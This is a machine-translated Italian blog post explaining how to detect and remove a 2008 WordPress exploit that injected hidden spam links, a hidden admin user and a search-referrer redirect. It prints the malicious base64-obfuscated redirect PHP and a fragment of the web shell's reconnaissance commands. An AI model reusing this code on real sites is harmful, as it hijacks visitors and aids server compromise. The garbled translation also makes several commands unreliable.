Nell'ultimo mese, ho ricevuto avvertimenti virus nel blog da alcuni visitatori. Inizialmente ho ignorato gli avvertimenti, perché ho installato un antivirus abbastanza buono (Kaspersky AV 2009) E anche blog per molto tempo, non ho mai ricevuto un avviso di virus (molto tempo fa .. ho visto qualcosa di sospetto che il primo aggiornamento scomparso. Infine ...).
Lentamente ha iniziato a mostrare grandi variazioni visitatore trafficoDopo che ha recentemente diminuito costantemente il traffico e ha iniziato ad essere sempre più persone mi dicono che stealthsettings.com è virused. Ieri ho ricevuto da qualcuno uno screenshot fatto quando antivirus bloccato copione da stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. E 'stato abbastanza convincente per me, così ho messo tutte le fonti di ricerche. La prima idea che mi è venuta in mente era di fare upgrade l'ultima WordPress (2.5.1), ma non prima di aver eliminato tutti i file nel vecchio script WordPress e fare backup del database. Questa procedura non ha funzionato e probabilmente mi ci è voluto molto tempo per capire dove fosse il bug, se non me l'avesse detto. Eugen in una discussione davanti a un caffè, ha trovato collegamento Google e sarebbe bello vederlo.
MyDigitalLife.info, ha pubblicato un articolo dal titolo: "WordPress Hack: recupera e correggi Google e motore di ricerca o nessun traffico di cookie reindirizzato a Your-Needs.info, AnyResults.Net, Golden-Info.net e altri siti illegali"Questa è la fine del filo avevo bisogno.
Si tratta di un sfruttare de WordPress basato sui cookieChe credo sia molto complessa e ha reso il libro. Abbastanza intelligente per fare una SQL Injection Database blog, creare un utente invisibile un controllo di routine semplice Performance modelli/hostess->Utenti, controllare le directory del server e dei file "scrivibili" (Quello chmod 777), cercare e a eseguire file con i privilegi del gruppo o della radice. Io non so che sfruttano il nome e vedere che ci sono alcuni articoli scritti su di lui, nonostante il fatto che molti blog sono infetti, tra cui la Romania. Ok ... proverò a cercare di spiegare generalità circa il virus.
Che cosa è privo di virus?
In primo luogo, inserire le pagine fonti sui blog, i collegamenti invisibili ai visitatori, ma visibile e indicizzabile per i motori di ricerca, in particolare Google. In questo modo Pagina di trasferimento siti Classifica indicati dal malintenzionato. Secondo, ne viene inserito un altro reindirizzamento codice URL per i visitatori provenienti da Google, Live, Yahoo, ... o un lettore di RSS e non il sito in biscotto. un antivirus rileva come il reindirizzamento Trojan-Clicker.HTML.
Sintomi:
Diminuzione massiccio traffico visitatoriSoprattutto sui blog, dove la maggior parte dei visitatori provengono da Google.
Identificazione: (è qui che il problema si complica per chi non sa molto di phpmyadmin, php e linux)
LA. ATTENZIONE! Prima di tutto un database di backup!
1. Controllare i file di origine index.php, header.php, footer.php, Il tema del blog e vedere se c'è un codice che utilizza la crittografia base64 o contiene "if ($ ser ==" 1? && sizeof ($ _ COOKIE) == 0) "nella forma:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... O qualcosa del genere. Elimina questo codice!
Clicca sulla foto ...
Nello screenshot sopra ho selezionato per sbaglio e " ". Quel codice deve rimanere.
2. Utilizzare phpMyAdmin e vai alla tabella del database wp_usersDove verificare se non c'è un nome utente creato su 00:00:00 0000-00-00 (Possibile in campo user_login scrivere "WordPress”. Annotare l'ID di questo utente (campo ID) e quindi eliminarlo.
Clicca sulla foto ...
* La linea verde deve essere rimosso e conservato il suo ID. Nel caso di assonnatoEra ID = 8 .
3. Vai alla tabella wp_usermeta, Dove si collocato e pulire linee per ID (dove il campo user_id Valore di ID viene rimosso).
4. In Tabella wp_option, Vai a active_plugins e vedere quali plugin è abilitato sospetto. Può essere utilizzato come terminazioni _old.giff, _old.pngg, _old.jpeg, _new.php.giff, ecc. combinazioni di estensioni immagine avanzate con _old e _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Elimina questo plugin, quindi vai sul blog -> Dashboard -> Plugin, dove disattivi e attivi qualsiasi plugin.
Clicca sull'immagine per vedere appare virus active_plugins file.
Seguite il percorso sul sito FTP o SSH, indicato in active_plugins ed eliminare il file dal server.
5. Anche in phpMyAdmin, in Tabella wp_option, Individuare ed eliminare la riga contenente "rss_f541b3abd05e7962fcab37737f40fad8'E'internal_links_cache ".
In internal_links_cache, offerto link di spam criptati che compaiono in un blog codice di Google Adsnuca, L'hacker.
6. Si consiglia di cambiare la password Blog e login rimuovere tutti userele sospetto. Esegui l'aggiornamento all'ultima versione di WordPress e impostare il blog in modo che non consenta più la registrazione di nuovi utenti. Non c'è perdita… può commentare anche disabitata.
Ho provato sopra a spiegare un po 'cosa fare in una situazione del genere, per ripulire il blog da questo virus. Il problema è molto più grave di quanto sembri e non del tutto risolto, perché vengono utilizzati vulnerabilità di sicurezza che ospita il server web, che è il blog.
Come prima misura di sicurezza, con accesso SSH, Make alcuni controlli sul server per vedere se ci sono file come * _old * e * _Nuovo. * Con finali.giff,. jpeg,. pngg,. jpgg. Questi file devono essere cancellati. Se si rinomina un file, ad esempio. top_right_old.giff in top_right_old.phpVediamo che il file è esattamente il server codice exploit.
Alcune utili istruzioni per controllare, pulire e mettere in sicurezza il server. (tramite SSH)
1. cd / tmp e verificare se ci sono cartelle come tmpVFlma o altre combinazioni asemenatoare nome e eliminarlo. Vedere la schermata qui sotto, due cartelle tali me:
rm-rf nomecartella
2. Controlla ed elimina (modifica chmod-ul) il più possibile le cartelle con gli attributi chmod 777
trova tutti i file scrivibili nella directory corrente: Trova. -Type f-perm-2-ls
trovare tutte le directory scrivibili nella directory corrente: Trova. -Type d-perm-2-ls
trova tutte le directory e i file scrivibili nella directory corrente: Trova. -Perm-2-ls
3. Alla ricerca di file sospetti sul server.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, ATTENZIONE! i file che sono impostati bit SUID si SGID. Questi file vengono eseguiti con i privilegi dell'utente (gruppo) o root, non l'utente che esegue il file. Questi file possono portare alla compromissione di root, se i problemi di sicurezza. Se non si utilizzano i file SUID e SGID con bit, eseguire 'chmod 0 " loro o disinstallare imballaggio che li contiene.
Exploit contiene qualche parte nel sorgente ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Trova in questo modo ... fondamentalmente violazioni della sicurezza. Porte aprire la directory "scrivibile" e del gruppo dei privilegi di esecuzione dei file / root.
Torna con più ...
Alcuni blog infetti: www.blegoo.com, www.visurat.ro,
folgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motocyclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/inut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... L'elenco potrebbe continuare ... un sacco.
Puoi verificare se un blog è infetto utilizzando il motore di ricerca di Google. copia incolla:
Sito: www.blegoo.com buy
Buona notte e buon lavoro;) Penso che presto Eugen arriverà con delle novità, su prevedeable.unpredictable.com.
brb :)
ATTENZIONE! Cambiare il tema di WordPress o aggiorna a WordPress 2.5.1, NON è una soluzione per sbarazzarsi di questo virus.
